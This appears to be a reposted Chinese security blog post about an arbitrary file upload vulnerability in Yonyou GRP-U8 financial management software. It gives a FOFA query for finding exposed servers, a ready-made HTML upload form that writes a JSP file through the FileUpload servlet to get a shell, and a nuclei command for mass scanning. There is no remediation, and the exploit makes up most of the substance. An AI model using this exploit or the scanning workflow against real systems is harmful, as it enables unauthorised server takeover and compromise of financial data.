用友GRP-U8 财务管理软件servlet nuclei

admin 2023年2月2日19:35:08评论120 views字数 1216阅读4分3秒阅读模式
用友GRP-U8 财务管理软件servlet nuclei
    文章声明

安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。



用友GRP-U8 财务管理软件servlet nuclei


文章简介


用友GRP-U8 财务管理软件FileUpload任意文件上传漏洞,攻击者通过 preload 参数绕过身份验证进行文件上传,控制服务器。



网络测绘

app="用友-GRP-U8"



演示过程

用友GRP-U8 财务管理软件servlet存在漏洞,可通过GET参数fileName控制上传的文件名

/servlet/FileUpload

随便构造一个表单,上传任意文件即可

<html><form method="post" action="http://xxxx/servlet/FileUpload?fileName=t.jsp&actionID=update" encType="multipart/form-data">  <input type="file" name="rfile_name"/>  <input type="submit" value="upload"/></form></html>

上传后的最终路径为:

/R9iPortal/upload/xx.txt

用友GRP-U8 财务管理软件servlet nuclei

可直接getshell


nuclei-pocs

 nuclei  -t  yonyou_GRP-U8_UploadfileName_rce.yaml -l url.txt


公众号:北极星sec 回复1010获取


用友GRP-U8 财务管理软件servlet nuclei




用友漏洞待更新记录(已更新16)

  • 用友 U8 OA test.jsp SQL注入漏洞

  • 用友nc v6.5 远程命令执行漏洞(CNVD-2021-30167)

  • 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

  • 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞

  • 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞

  • 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

  • 用友 NC NCFindWeb 任意文件读取漏洞

  • 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923

  • 用友 GRP-U8 UploadFileData 任意文件上传漏洞 

  • 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

  • 用友nc 控制台绕过漏洞

  • 用友 NC 系统 uapws wsdl XXE(2022hw) 

  • 用友时空KSOA软件前台文件上传漏洞(2022hw)

  • 用友nc v6.5 反射型xss

  • 用友nc接口信息泄露漏洞

  • 用友GRP-U8 财务管理软件servlet

  • 用友 NCCloud FS文件管理SQL注入

  • 用友nc v6.5 反序列化漏洞 补丁绕过

  • 用友nc v6.5 反序列化漏洞

  • (CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞

  • 用友nc IUFO v5



用友GRP-U8 财务管理软件servlet nuclei




用友GRP-U8 财务管理软件servlet nuclei

用友GRP-U8 财务管理软件servlet nuclei

用友GRP-U8 财务管理软件servlet nuclei




原文始发于微信公众号(北极星sec):用友GRP-U8 财务管理软件servlet nuclei

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月2日19:35:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友GRP-U8 财务管理软件servlet nucleihttp://cn-sec.com/archives/1341519.html

发表评论

匿名网友 填写信息